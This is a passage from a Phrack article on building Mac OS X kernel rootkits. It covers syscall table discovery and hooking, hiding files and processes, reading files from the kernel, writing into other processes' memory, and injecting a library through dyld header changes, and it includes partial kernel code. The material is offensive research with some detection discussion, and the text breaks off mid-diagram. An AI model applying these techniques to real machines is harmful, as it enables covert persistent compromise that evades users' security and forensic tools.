|=-----------------------------------------------------------------------=|
|=-------------=[ Revisiting Mac OS X Kernel Rootkits ]=-----------------=|
|=-----------------------------------------------------------------------=|
|=---------------------=[ fG! <phrack@put.as> ]=-------------------------=|
|=-----------------------------------------------------------------------=|
1 - Introduction
2 - The classic problems
2.1 - What is new since Tiger
2.2 - Sysent table discovery techniques
2.3 - Hiding the kext
2.4 - Hiding files
2.5 - Hiding processes
2.6 - Modifying the syscall handler
3 - Reading the filesystem from kernel land
3.1 - Real short overview of VFS
3.2 - The easy way - Apple loves rootkit authors!
3.3 - The more complex way
3.4 - Solving kernel symbols
4 - Executing userland binaries from the kernel
4.1 - Writing from kernel memory into userland processes
4.2 - Abusing (again!) dyld to inject and run code
4.3 - Finding the place to execute the injection
4.4 - Ideas are great, execution is everything
4.5 - The dynamic library
4.6 - Hiding our tracks
5 - Revisiting userland<->kernel communication
5.1 - Character devices and ioctl
5.2 - Kernel control KPI
5.3 - Ideas for our own alternative channels
6 - Anti-forensics
6.1 - Cheap tricks to reduce our footprint
6.2 - Attacking DTrace and other instrumentation features
6.2.1 - FSEvents
6.2.2 - kdebug
6.2.3 - TrustedBSD
6.2.4 - Auditing - Basic Security Module
6.2.5 - DTrace
6.2.5.1 - syscall provider
6.2.5.2 - fbt provider
6.3 - AV-Monster II
6.4 - Bypassing Little Snitch
6.5 - Zombie rootkits
7 - Caveats & Detection
8 - Final words
9 - References
10 - T3h l337 c0d3z
--[ 1 - Introduction
The defensive knowledge and available tools are still poor. I hope
this article motivates others to invest time and resources to improve
this scenario. It is quite certain that the offensive knowledge is
significantly ahead.
The easiest, and for many the favourite, place to hook system calls is
the sysent table - just replace a pointer and we are set. Apple has been
improving the defence of that "castle" by hiding the sysent table symbol
and moving its location.
Up to Snow Leopard, Apple removed the symbol table from kernel space
so there was no easy way to solve non-exported symbols inside a kernel
extension or I/O Kit driver. This was changed in Lion by leaving the full
__LINKEDIT segment in kernel memory but marked as pageable. Snare shows
this in one of his posts [5] and the rubilyn rootkit uses it. Beware that
the formula they use has a small problem - it assumes that the symbol
table is located at the beginning of __LINKEDIT. This is true in Lion
but not in Mountain Lion.
I will show you a solution that is stable, simple, and compatible
with all OS X versions. Too good to be true! :-)
Let's illustrate this with an example, starting with Mountain Lion 10.8.2:
- unix_syscall
- unix_syscall64
- unix_syscall_return
On page 332 there is a code snippet that searches memory for "something
that has the same structure as the sysent table". The starting search
point is the nsysent symbol, and the memory pointer is then increased to
look up and match sysent array elements.
That code snippet does not work with Snow Leopard because the sysent array
is located before the nsysent symbol. It must be modified to support
specific versions and releases.
The second technique can be adapted to cover all cases. First we would
scan memory addresses above nsysent and then below if the initial search
failed. If nsysent also stops being exported we would need to base the
search on another symbol and continue the cat & mouse game.
Once we have the interrupt 80 handler address we can find out the
base address of the kernel. Kernel ASLR does not matter here because
the handler address is always a valid kernel code location - we are
dynamically querying the system and not using fixed addresses. Finding
the kernel base address is just a matter of searching memory backwards
for the magic value of the Mach-O header - 0xfeedfacf (64 bits) or
0xfeedface (32 bits).
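The backwards search itself can be sketched in plain userland C against
a memory buffer. This is only a simulation under stated assumptions:
find_macho_header() and SCAN_STEP are hypothetical names, the buffer
stands in for mapped memory, and the header is assumed to be page
aligned.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MH_MAGIC_64 0xfeedfacfu /* 64-bit Mach-O magic */
#define MH_MAGIC_32 0xfeedfaceu /* 32-bit Mach-O magic */
#define SCAN_STEP   0x1000u     /* assumption: header is page aligned */

/*
 * Scan backwards from start_off inside image for a Mach-O magic value.
 * Returns the offset of the header, or -1 if none is found.
 */
static long find_macho_header(const uint8_t *image, size_t image_len,
                              size_t start_off)
{
    assert(image != NULL && start_off < image_len);

    /* round down to the start of the containing page */
    size_t off = start_off & ~(size_t)(SCAN_STEP - 1);

    for (;;) {
        uint32_t magic;
        if (off + sizeof(magic) <= image_len) {
            memcpy(&magic, image + off, sizeof(magic));
            if (magic == MH_MAGIC_64 || magic == MH_MAGIC_32)
                return (long)off;
        }
        if (off == 0)
            break;          /* reached the start of the buffer */
        off -= SCAN_STEP;   /* step one page back */
    }
    return -1;
}
```

Stepping one page at a time keeps the number of probes small; a byte by
byte search would also work but is slower and more prone to false
positives.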
The next step is to process the Mach-O headers and find out where the
__DATA segment is located. The reason for this is that the sysent table
is located in there - we need to extract segment's start address and
boundaries. Now it is just a matter of searching memory for something
that matches the sysent table.
Are there any performance problems doing things like this? The sysent
location is found in less than a second even on a 5 year old Core 2 Duo
Macbook Pro. The performance impact can be considered meaningless.
This method was applied successfully when the first Mountain Lion
developer preview became available and still works up to 10.8.2.
You can find its implementation in the included source code at the end.
A userland version that uses /dev/kmem to extract the same information
is available at [9].
What is the difference compared to using any other exported symbol instead
of all the trouble with the interrupt handler? Honestly, it is just a
matter of personal preference and technical "prowess". A symbol that
breaks compatibility if removed could be used instead with very low risk
of Apple changing it. Later, we will need to use at least one KPI so
almost any symbol from it can be used as the search's starting point.
One way to get its value in 64 bits is the following (ripped from XNU):
#define rdmsr(msr,lo,hi) \
__asm__ volatile("rdmsr" : "=a" (lo), "=d" (hi) : "c" (msr))
IORecursiveLockLock(sKextLock);
Testing this approach I was able to find the method referenced above with
a precision of 100% or 50%. The different rates depend on how strict
the search parameters are, due to some differences in compiler output
between kernel versions. I'm talking about the number of calls, jmps,
jnz, jae, which have small variations between some versions (compiler
upgrades, settings, etc). The performance is amazing - it takes 1 second
to disassemble and search the whole kernel using a high-end Intel i7 cpu.
struct direntry {
__uint64_t d_ino; /* file number of entry */
__uint64_t d_seekoff; /* seek offset (optional, used by servers) */
__uint16_t d_reclen; /* length of this record */
__uint16_t d_namlen; /* length of string in d_name */
__uint8_t d_type; /* file type, see below */
char d_name[__DARWIN_MAXPATHLEN]; /*entry name (up to MAXPATHLEN bytes)*/
};
The match is done against the field d_name, which only contains the
current file or folder name without the full path. This is the reason why
most implementations match the file name anywhere in the filesystem.
Luckily for us, all syscall function prototypes take the proc
structure as the first parameter. It contains enough information to
match the full pathname.
struct proc {
(...)
struct filedesc *p_fd; /* Ptr to open files structure. */
(...)
};
struct filedesc {
struct fileproc **fd_ofiles; /* file structures for open files */
char *fd_ofileflags; /* per-process open file flags */
struct vnode *fd_cdir; /* current directory */
struct vnode *fd_rdir; /* root directory */
int fd_nfiles; /* number of open files allocated */
int fd_lastfile; /* high-water mark of fd_ofiles */
(...)
};
The files listed by this function are not the files we want to hide but
the files opened by the binary calling this syscall. This information
can be used, for example, to find the path that a "ls" command is trying
to list. The full path can be extracted manually by iterating over the
vnodes of each file, or by using a KPI function (vn_getpath).
To build the path from vnodes, first we retrieve the vnode structure
corresponding to the file and then walk up to the filesystem
root - each vnode has a reference to its parent vnode.
struct vnode {
(...)
const char *v_name; /* name component of the vnode */
vnode_t v_parent; /* pointer to parent vnode */
(...)
};
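The parent walk can be sketched in userland with a stand-in structure.
This is a minimal illustration, not kernel code: struct fake_vnode and
build_path() are hypothetical names that only mirror the v_name and
v_parent fields shown above, and the root is assumed to be the node
whose parent is NULL.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for the two vnode fields shown above. */
struct fake_vnode {
    const char        *v_name;   /* name component */
    struct fake_vnode *v_parent; /* parent, NULL at the root (assumption) */
};

/*
 * Build the full path of vp into buf by walking the v_parent links.
 * The path is assembled right to left at the end of the buffer and then
 * moved to the front. Returns 0 on success, -1 if buf is too small.
 */
static int build_path(const struct fake_vnode *vp, char *buf, size_t buflen)
{
    assert(vp != NULL && buf != NULL);
    if (buflen < 2)
        return -1;

    size_t pos = buflen - 1;
    buf[pos] = '\0';

    /* stop at the root: its name is represented by the leading '/' */
    for (; vp != NULL && vp->v_parent != NULL; vp = vp->v_parent) {
        size_t n = strlen(vp->v_name);
        if (pos < n + 1)
            return -1;              /* no room for "/name" */
        pos -= n;
        memcpy(buf + pos, vp->v_name, n);
        buf[--pos] = '/';
    }
    if (buf[pos] == '\0')           /* vp was the root itself */
        buf[--pos] = '/';

    memmove(buf, buf + pos, buflen - pos);
    return 0;
}
```

Building from the end of the buffer avoids having to know the depth of
the file in advance or to reverse the components afterwards.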
To find the folder or file being listed we can use the following trick,
which seems to hold true:
The only word of caution is when shell expansion is involved. In this case
the last file entry name will be "ttys" and we need to iterate the
fd_ofiles array looking for the element previous to "ttys" - it is not
lastfile-1.
/*!
@function vn_getpath
@abstract Construct the path to a vnode.
@discussion Paths to vnodes are not always straightforward: a file with
multiple hard-links will have multiple pathnames, and it is sometimes
impossible to determine a vnode's full path. vn_getpath() will not enter
the filesystem.
@param vp The vnode whose path to obtain.
@param pathbuf Destination for pathname; should be of size MAXPATHLEN
@param len Destination for length of resulting path string. Result will
include NULL-terminator in count--that is, "len"
will be strlen(pathbuf) + 1.
@return 0 for success or an error code.
*/
int vn_getpath(struct vnode *vp, char *pathbuf, int *len);
We still need to retrieve a vnode from the proc structure to use this
function. To find the vnode we can use the lastfile trick to find the
target path, retrieve its vnode and then use this function to get the
full path.
A better solution is to hide your data inside other data files that
can't be easily checksum'ed. Sqlite3 databases come to my mind [35].
The traditional way to hide processes is to filter them out of the
process list that the kernel returns. When an application requests the
process list, the rootkit intercepts the request and modifies the
results. In this case, only the results are modified and the underlying
structures are still intact. A rootkit detection tool can access those
structures and compare them with the results.
Another possibility is to remove the processes from the process list
itself. This time a tool that is based on the information in those
structures will not be able to detect the inconsistency because there is
none (regarding only the proc list, because there is data in other
structures that can be used to signal inconsistencies).
Due to the OS X design, things are a bit more fun (or complicated) because
the BSD layer runs on top of the Mach layer. The basic process units are
Mach tasks and threads and there's a one-to-one mapping between BSD
processes and Mach tasks. The task is just a container and Mach threads
are the units that execute code. What matters for this case is that there
is an additional list where inconsistencies can be detected - the Mach
tasks list. Using an ascii version of nofate's diagram found at [3]:
Each BSD process has a reference to its Mach task via a void pointer
and vice-versa. Traversing both lists can detect the inconsistency
described above and most certainly flag an installed rootkit (it is
possible to have a Mach task without a corresponding BSD process).
struct proc {
(...)
void *task; /* corresponding task (static) */
(...)
};
struct task {
(...)
void *bsd_info; /* the corresponding proc_t */
(...)
};
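From the defensive side, the cross-check between both lists can be
sketched like this. It is a userland simulation only: sim_proc, sim_task
and the next pointers are hypothetical stand-ins for the real lists, and
only the task and bsd_info back-pointers mirror the fields shown above.

```c
#include <assert.h>
#include <stddef.h>

struct sim_task;

struct sim_proc {
    int              p_pid;
    struct sim_task *task;     /* mirrors proc->task */
    struct sim_proc *next;     /* next entry in the BSD process list */
};

struct sim_task {
    struct sim_proc *bsd_info; /* mirrors task->bsd_info */
    struct sim_task *next;     /* next entry in the Mach task list */
};

/* Returns 1 if p is reachable from the head of the process list. */
static int proc_is_listed(const struct sim_proc *head,
                          const struct sim_proc *p)
{
    assert(p != NULL);
    for (; head != NULL; head = head->next)
        if (head == p)
            return 1;
    return 0;
}

/*
 * Walk the task list and count tasks whose BSD process is missing from
 * the process list. A non-zero result means the two lists disagree.
 */
static int count_unlinked_procs(const struct sim_proc *procs,
                                const struct sim_task *tasks)
{
    int suspicious = 0;
    for (const struct sim_task *t = tasks; t != NULL; t = t->next) {
        if (t->bsd_info == NULL)
            continue; /* task without a BSD process is legitimate */
        if (!proc_is_listed(procs, t->bsd_info))
            suspicious++;
    }
    return suspicious;
}
```

The quadratic lookup is fine for a sketch; a real tool would probably
index the process list first.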
The (not so new) lesson to extract from this is that there are many
points that can be used for detecting inconsistencies in the system. These
are hard to cover if the goal is to hide one or more rogue processes. A
much better solution is to piggyback on normal processes, where detection
is a bit harder - it can be a normal process with an extra thread running
for example. The piggyback solution will be used later to run userland
commands from the kernel.
USER_TRAP_SPC(0x80,idt64_unix_scall)
(...)
code = regs->rax & SYSCALL_NUMBER_MASK;
DEBUG_KPRINT_SYSCALL_UNIX(
"unix_syscall64: code=%d(%s) rip=%llx\n",
code, syscallnames[code >= NUM_SYSENT ? 63 : code], regs->isf.rip);
callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
uargp = (void *)(&regs->rdi);
(...)
AUDIT_SYSCALL_ENTER(code, p, uthread);
error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
AUDIT_SYSCALL_EXIT(code, p, uthread, error);
(...)
loc_FFFFFF80005E169C:
4C 03 2D 2D EA 21 00 add r13, cs:sysent
4C 3B 2D 26 EA 21 00 cmp r13, cs:sysent
74 0B jz short loc_FFFFFF80005E16B7
Another way is to modify the code reference to __got section and instead
point it to somewhere else. This is very easy to implement with diStorm's
assistance.
One way to make this safer is to put the pointer in kernel's memory
space. This can be alignment space, Mach-O header (for the lulz!), or
somewhere else (it is just a data pointer so no need for exec permission).
Now let's get going with the fun stuff that opens the door to even
funnier stuff!
Possible solutions are to solve the symbols from userland, and pattern
search from the kext - this one easily susceptible to failure due to
changing patterns in kernel versions and compilers.
Two methods will be shown, one very easy based on exported symbols (and
a copy of a very stable private extern kernel function), and another a
bit more complex that requires some unexported symbols. Both are based on
VFS - the obvious and easiest way to achieve our goal. Other functions
can be used so many variations are possible. That is left open for you
to explore, I still have a lot to write about in this paper :-)
The first piece of information that we need is the vnode of the target
file we want to read. We have already seen in section 2.4 that this
information is available in the proc_t structure but we can follow an
easier path!
/*!
@function vnode_lookup
@abstract Convert a path into a vnode.
@discussion This routine is a thin wrapper around xnu-internal lookup
routines; if successful, it returns with an iocount held on the resulting
vnode which must be dropped with vnode_put().
@param path Path to look up.
@param flags VNODE_LOOKUP_NOFOLLOW: do not follow symbolic links.
VNODE_LOOKUP_NOCROSSMOUNT: do not cross mount points.
@return Results 0 for success or an error code.
*/
errno_t vnode_lookup(const char *, int, vnode_t *, vfs_context_t);
The arguments are the path for the target file, search flags, a vnode_t
pointer for output and the vfs context for the current thread (or kernel
context).
errno_t
vnode_lookup(const char *path, int flags, vnode_t *vpp, vfs_context_t ctx)
{
struct nameidata nd;
int error;
u_int32_t ndflags = 0;
#include <sys/vnode.h>
int error = 0;
vnode_t kernel_vnode = NULLVP;
error = vnode_lookup("/mach_kernel", 0, &kernel_vnode, NULL);
With the kernel's vnode information we can finally read its contents from
the rootkit. To do that we can use the VNOP_READ() function - documented
and declared at bsd/sys/vnode_if.h.
/*!
@function VNOP_READ
@abstract Call down to a filesystem to read file data.
@discussion VNOP_READ() is where the hard work of the read() system
call happens. The filesystem may use the buffer cache, the cluster layer,
or an alternative method to get its data; uio routines will be used to see
that data is copied to the correct virtual address in the correct address
space and will update its uio argument to indicate how much data has been
moved.
@param vp The vnode to read from.
@param uio Description of request, including file offset, amount of data
requested, destination address for data, and whether that destination is in
kernel or user space.
@param ctx Context against which to authenticate read request.
@return 0 for success or a filesystem-specific error. VNOP_READ() can
return success even if less data was read than originally requested;
returning an error value should indicate that something actually went
wrong.
*/
extern errno_t VNOP_READ(vnode_t, struct uio *, int, vfs_context_t);
Two are available in BSD KPIs - uio_create and uio_addiov. The other
one, uio_createwithbuffer is private extern and used by uio_create. We
can rip its implementation into our rootkit code from XNU source file
bsd/kern/kern_subr.c. It's simple and stable enough to make this possible
(never modified in all latest OS X versions).
Once again we can pass NULL to the ctx argument - the implementation takes
care of it for us as in vnode_lookup().
char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
uio = uio_create(1, 0, UIO_SYSSPACE, UIO_READ);
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);
char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
char uio_buf[UIO_SIZEOF(1)];
uio = uio_createwithbuffer(1, 0, UIO_SYSSPACE, UIO_READ, &uio_buf[0],
sizeof(uio_buf));
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);
First create the uio structure and then add the data buffer to it with
uio_addiov(), otherwise it can't be used.
The data buffer can be a statically allocated buffer (as above) or
dynamically allocated using _MALLOC() or another available kernel variant.
With the uio buffer created, the last step is to execute the read:
If successful, data_buffer will contain the first page (4096 bytes) of
/mach_kernel.
This second approach was in fact how I started to explore this problem,
before I learnt about vnode_lookup(). It is a good backup method
but the learning experience and some of the techniques used to obtain
information are the interesting bits here.
/*!
@function VNOP_LOOKUP
@abstract Call down to a filesystem to look for a directory entry by name.
@discussion VNOP_LOOKUP is the key pathway through which VFS asks a
filesystem to find a file. The vnode should be returned with an iocount to
be dropped by the caller. A VNOP_LOOKUP() calldown can come without a
preceding VNOP_OPEN().
@param dvp Directory in which to look up file.
@param vpp Destination for found vnode.
@param cnp Structure describing filename to find, reason for lookup, and
various other data.
@param ctx Context against which to authenticate lookup request.
@return 0 for success or a filesystem-specific error.
*/
#ifdef XNU_KERNEL_PRIVATE
extern errno_t VNOP_LOOKUP(vnode_t, vnode_t *, struct componentname *,
vfs_context_t);
#endif /* XNU_KERNEL_PRIVATE */
The first argument is the vnode of the directory where the target file
is located. It is a kind of a chicken and egg problem because we do not
have that information - we want it! Do not fear, this information can
be extracted from somewhere else. As previously described, the proc
structure contains the field p_fd - pointer to open files structure
(struct filedesc).
The filedesc structure has two interesting fields for our purposes:
There is also fd_rdir, which is the vnode of root directory but from my
tests it is usually NULL.
The proposed procedure is to traverse the proc structure and find pid 0
(field p_pid). When found, the field fd_cdir will contain what we need -
the vnode for the root directory.
Next problem: how to access the proc structure. There is a symbol called
allproc that contains a pointer to it but it is not exported anymore. We
need an alternative way! Two solutions: complicated and straightforward.
The kernel does not keep /mach_kernel open so the field fd_ofiles is
not useful. Luckily for us the fd_cdir is populated with the information
we need - the vnode of the root directory /.
The kernel knowledgeable reader knows there is no need for all this
mess to retrieve a proc_t structure. There is a BSD KPI function that
solves the problem with a single call, proc_find(). Its prototype is:
proc_t proc_find(int pid)
Once again we need a vfs context and this time we need to supply it. While
researching I used a hardcoded function pointer to vfs_context_current()
but there is a better function that I found out while writing this
section. It is vfs_context_create(), available in BSD KPI.
/*!
@function vfs_context_create
@abstract Create a new vfs_context_t with appropriate references held.
@discussion The context must be released with vfs_context_rele() when no
longer in use.
@param ctx Context to copy, or NULL to use information from running
thread.
@return The new context, or NULL in the event of failure.
*/
vfs_context_t vfs_context_create(vfs_context_t);
struct componentname {
// Arguments to lookup.
uint32_t cn_nameiop; /* lookup operation */
uint32_t cn_flags; /* flags (see below) */
void *cn_reserved1; /* use vfs_context_t */
void *cn_reserved2; /* use vfs_context_t */
// Shared between lookup and commit routines.
char *cn_pnbuf; /* pathname buffer */
int cn_pnlen; /* length of allocated buffer */
char *cn_nameptr; /* pointer to looked up name */
int cn_namelen; /* length of looked up component */
uint32_t cn_hash; /* hash value of looked up name */
uint32_t cn_consume; /* chars to consume in lookup() */
};
cnp.cn_nameiop = LOOKUP;
cnp.cn_flags = ISLASTCN;
cnp.cn_reserved1 = vfs_context_create(NULL);
cnp.cn_pnbuf = tmpname;
cnp.cn_pnlen = sizeof(tmpname);
cnp.cn_nameptr = cnp.cn_pnbuf;
cnp.cn_namelen = (int)strlen(tmpname); // <- add NULL ?
Now we are ready to call VNOP_LOOKUP() and use the returned vnode
information to execute VNOP_READ() as in section 3.2 (do not forget to
first create the UIO buffer).
Last but not least, there is another function we can (ab)use to read files
- vn_rdwr(). It was this function that triggered my curiosity about this
process while reading about the execution flow of a Mach-O binary. The
parameters it requires can be retrieved or created with the techniques
described above or others you might come up with. Feel free to implement
it and discover alternative ways to read the files (there are more!).
Writing is not harder than reading. Just browse the source files mentioned
in this section and the functions you need will be obvious. You can
apply the techniques described here to fill the required parameters.
----[ 3.4 - Solving kernel symbols
Snare explains in detail how to solve the kernel symbols in his blog
post [5]. The only difference is that instead of reading directly from
kernel memory we have the information in temporary buffers with data
read from the filesystem.
1) Read the first page of /mach_kernel, which contains the Mach-O header.
2) Process the Mach-O header and retrieve the following information:
- From __TEXT segment: vmaddr field (for ASLR slide computation).
- From __LINKEDIT segment: fileoff and filesize (so we can read the
segment).
- From LC_SYMTAB command: symoff, nsyms, stroff, strsize.
Refer to [10] for more information about Mach-O file format.
3) Allocate buffer and read the whole __LINKEDIT segment.
4) Solve any required symbol by processing the __LINKEDIT buffer using the
LC_SYMTAB collected information (offsets to symbol and string tables).
5) Do not forget to add the kernel ASLR slide to the addresses. Slide can
be computed by the difference between running __TEXT vmaddr and the one
read from disk.
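Steps 4 and 5 can be sketched in plain C over a buffer holding the
__LINKEDIT contents. This is a minimal sketch under stated assumptions:
struct nlist_64_min is a hand-written mirror of the Mach-O nlist_64
layout, and struct symtab_info and solve_symbol() are hypothetical
names. Note that symoff and stroff are file offsets, so they are rebased
against the __LINKEDIT fileoff instead of assuming that the symbol table
sits at the start of the segment.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hand-written mirror of the Mach-O nlist_64 layout (16 bytes). */
struct nlist_64_min {
    uint32_t n_strx;  /* offset of the name inside the string table */
    uint8_t  n_type;
    uint8_t  n_sect;
    uint16_t n_desc;
    uint64_t n_value; /* symbol address as stored on disk */
};

/* Hypothetical container for the values collected in step 2. */
struct symtab_info {
    uint64_t linkedit_fileoff; /* __LINKEDIT fileoff */
    uint64_t linkedit_size;    /* __LINKEDIT filesize */
    uint32_t symoff, nsyms;    /* from LC_SYMTAB */
    uint32_t stroff, strsize;  /* from LC_SYMTAB */
};

/*
 * Look up name in the __LINKEDIT buffer and return its address with the
 * slide applied, or 0 if the symbol is not found or the offsets do not
 * fit inside the buffer.
 */
static uint64_t solve_symbol(const uint8_t *linkedit,
                             const struct symtab_info *si,
                             const char *name, uint64_t slide)
{
    assert(linkedit != NULL && si != NULL && name != NULL);

    if (si->symoff < si->linkedit_fileoff ||
        si->stroff < si->linkedit_fileoff)
        return 0;
    /* rebase file offsets to offsets inside our buffer */
    uint64_t sym_rel = si->symoff - si->linkedit_fileoff;
    uint64_t str_rel = si->stroff - si->linkedit_fileoff;
    if (sym_rel + (uint64_t)si->nsyms * sizeof(struct nlist_64_min) >
            si->linkedit_size ||
        str_rel + si->strsize > si->linkedit_size)
        return 0;

    const char *strtab = (const char *)(linkedit + str_rel);
    for (uint32_t i = 0; i < si->nsyms; i++) {
        struct nlist_64_min nl;
        memcpy(&nl, linkedit + sym_rel + i * sizeof(nl), sizeof(nl));
        if (nl.n_strx >= si->strsize)
            continue; /* corrupt entry, skip it */
        size_t max = si->strsize - nl.n_strx;
        /* bounded compare so we never read past the string table */
        if (strlen(name) < max &&
            strncmp(strtab + nl.n_strx, name, max) == 0)
            return nl.n_value + slide;
    }
    return 0;
}
```

The slide argument is the difference between the running __TEXT vmaddr
and the one read from disk, as described in step 5.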
There is no need to read the whole mach_kernel file into kernel space,
we just need the headers and __LINKEDIT segment, around 1MB, smaller
than the 7.8MB of Mountain Lion 10.8.2 full kernel. Kernel memory is at
a premium :-)
We need another solution and I will present not one but two, both easy
to use. Thanks go to snare for giving me some initial sample code from
his own research.
The vm_map_copyout() function copies the object into the target map,
aka, our target process. We need the vm_map_t info for kernel and target
process - both can be found by iterating proc list or proc_find(),
as previously described.
kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname,
strlen(fname)+1, FALSE, &copy);
kr = vm_map_copyout(task->map, &dst_addr, copy);
dst_addr will contain the value 0x11fa000 (target was a 32 bits process).
Dumping the process memory:
0x11fa000 6e 65 6d 6f 5f 61 6e 64 5f 73 6e 61 72 65 5f 72 nemo_and_snare_r
0x11fa010 75 6c 65 21 00 00 00 00 00 00 00 00 00 00 00 00 ule!............
At this point we need to copy the contents to the target address we
want. This can be achieved using mach_vm_copy() - a function that
copies one memory region to another within the same task. The address
where the data was copied to is returned in the second parameter of
vm_map_copyout().
vm_map_copy_t copy;
char *fname = "nemo_and_snare_rule!";
vm_map_address_t dst_addr;
// copy the object to userland, this will allocate a new space into target
// map
kr = vm_map_copyout((vm_map_t)task->map, &dst_addr, copy);
printf("wrote to userland address 0x%llx\n", CAST_USER_ADDR_T(dst_addr));
// and now we can use mach_vm_copy() because it copies data within the same
// task
kr = mach_vm_copy((vm_map_t)task->map, CAST_USER_ADDR_T(dst_addr),
strlen(fname)+1, 0x1000);
// release references created with proc_find() - must be always done!
proc_rele(p);
proc_rele(p_kernel);
/*
* vm_map_remove:
* Remove the given address range from the target map.
* This is the exported form of vm_map_delete.
*/
extern kern_return_t
vm_map_remove(vm_map_t map,
vm_map_offset_t start,
vm_map_offset_t end,
boolean_t flags);
An easy alternative is to just zero those bytes and accept that space
as a small memory leak. It works and it is not a big deal.
The second solution requires a single function and has no
memory allocation at the target process. We are talking about
vm_map_write_user(): "Copy out data from a kernel space into space in
the destination map. The space must already exist in the destination map."
The prototype:
kern_return_t
vm_map_write_user(vm_map_t map, void *src_p, vm_map_address_t dst_addr,
vm_size_t size);
Where map is the vm_map_t of the target process, and src_p the kernel data
buffer we want to write to the process. The previous example using this
function:
struct proc *p = proc_find(PID);
struct task *task = (struct task*)(p->task);
kern_return_t kr = 0;
vm_prot_t new_protection = VM_PROT_WRITE | VM_PROT_READ;
char *fname = "nemo_and_snare_rule!";
// modify memory permissions
kr = mach_vm_protect(task->map, 0x1000, strlen(fname)+1, FALSE,
new_protection);
kr = vm_map_write_user(task->map, fname, 0x1000, strlen(fname)+1);
proc_rele(p);
This alternative is easier and does not allocate new memory at the target.
Do not forget to restore the original memory permissions.
After so many words you are probably asking why not use copyout to copy
from kernel to userland? Well, of course it is possible but there is
a problem. It can't be used to write to arbitrary processes - only
to the current process. Even if we try to change the current map to
another process using vm_map_switch(), copyout will always retrieve the
current process, so it will fail with EFAULT if we try an address
of another process that does not exist in the current one. This means
that it can be used, for example, inside a hooked syscall but not to
write to arbitrary processes.
The presentations at Secuinside [11] and HitCon [12] discuss the Mach-O
header details and injection process. This is valid for dynamically
linked executables, where execution will start at the dynamic linker
(/usr/lib/dyld) and then continue at the executable entry point.
A simplified version of the binary execution process, adapted from [13] is:
The above diagram presents many places where we can modify the new process
memory and its Mach-O header. As previously mentioned, when dyld gains
control it will parse the Mach-O header again, so our modification is
guaranteed to be used if made before dyld takes control.
//
// Entry point for dyld. The kernel loads dyld and jumps to __dyld_start
// which sets up some registers and call this function.
//
// Returns address of main() in target program which __dyld_start jumps to
//
uintptr_t
_main(const macho_header* mainExecutableMH, uintptr_t mainExecutableSlide,
int argc, const char* argv[], const char* envp[],
const char* apple[], uintptr_t* startGlue)
The kernel has no symbol stubs so we can't just modify a pointer and
hijack a useful function. One solution is to inline hook the function
prologue and make it jump to our function. We can simplify this by
implementing the whole original function (copy from XNU source into our
rootkit); this way we do not need to return back to the original one,
just restore the original bytes when we finish our evil work.
void
task_set_dyld_info(task_t task, mach_vm_address_t addr,
mach_vm_size_t size)
{
task_lock(task);
task->all_image_info_addr = addr;
task->all_image_info_size = size;
task_unlock(task);
}
The lock calls are nothing more than macros using a symbol available in
the KPIs:
It is a great candidate - we can copy & paste its code into our
rootkit source, add our code to inject the library and then execute
the original function code. Because it is not a static function we can
find its symbol. The first parameter is a task_t structure, which has
a pointer to the corresponding proc_t structure (remember that proc and
task structures are connected to each other via void pointers).
/*
* Remember file name for accounting.
*/
p->p_acflag &= ~AFORK;
/* If the translated name isn't NULL, then we want to use
* that translated name as the name we show as the "real" name.
* Otherwise, use the name passed into exec.
*/
if (0 != imgp->ip_p_comm[0]) {
bcopy((caddr_t)imgp->ip_p_comm, (caddr_t)p->p_comm,
sizeof(p->p_comm));
} else {
if (imgp->ip_ndp->ni_cnd.cn_namelen > MAXCOMLEN)
imgp->ip_ndp->ni_cnd.cn_namelen = MAXCOMLEN;
bcopy((caddr_t)imgp->ip_ndp->ni_cnd.cn_nameptr, (caddr_t)p->p_comm,
(unsigned)imgp->ip_ndp->ni_cnd.cn_namelen);
p->p_comm[imgp->ip_ndp->ni_cnd.cn_namelen] = '\0';
}
The process name in the proc_t structure is only set after the second call
to task_set_dyld_info(), so we can't use it to detect which process
is going to be executed and decide whether to trigger our injection
(remember we are only interested in a specific process to be executed by
launchd). A workaround to this problem is to look up the open files
structure in proc_t (p_fd field).
void proc_resetregister(proc_t p)
{
proc_lock(p);
p->p_lflag &= ~P_LREGISTER;
proc_unlock(p);
}
Start contains the lowest address of the process, which is where the
Mach-O header is located. This *appears* to always hold true (there
are good reasons to believe it!).
The header can be retrieved from the user space with vm_map_read_user()
or copyin (because here we are executing in current proc context).
After we have found the free space and the full Mach-O header is in our
buffer, we just need to add a new LC_LOAD_DYLIB command.
The two diagrams below show what needs to be done at the Mach-O header:
.-------------------.
|      HEADER       |<- Fix this struct:
|-------------------|   struct mach_header {
|   Load Commands   |    uint32_t      magic;
|  .-------------.  |    cpu_type_t    cputype;
|  |  Command 1  |  |    cpu_subtype_t cpusubtype;
|  |-------------|  |    uint32_t      filetype;
|  |  Command 2  |  |    uint32_t      ncmds;      <- add +1
|  |-------------|  |    uint32_t      sizeofcmds; <- += size of new cmd
|  |     ...     |  |    uint32_t      flags;
|  |-------------|  |   };
|  |  Command n  |  |
|  |-------------|  |
|  | Command n+1 |  |<- add new command here:
|  `-------------'  |   struct dylib_command {
|-------------------|    uint32_t      cmd;
|       Data        |    uint32_t      cmdsize;
| .---------------. |    struct dylib  dylib;
| |   | Section 1 | |   };
| | 1 |-----------| |   struct dylib {
| |   | Section 2 | |    union lc_str  name;
| `---------------' |    uint32_t      timestamp;
| .---------------. |    uint32_t      current_version;
| |   | Section 1 | |    uint32_t      compatibility_version;
| | 2 |-----------| |   };
| |   | Section 2 | |   union lc_str {
| `---------------' |    uint32_t      offset;
|        ...        |   #ifndef __LP64__ // not used
|                   |    char          *ptr;
|                   |   #endif
|                   |   };
`-------------------'
A diff between original and modified:
.-------------------.     .-------------------.
|      HEADER       |     |      HEADER       |<- Fix this struct
|-------------------|     |-------------------|   struct mach_header {
|   Load Commands   |     |   Load Commands   |    ...
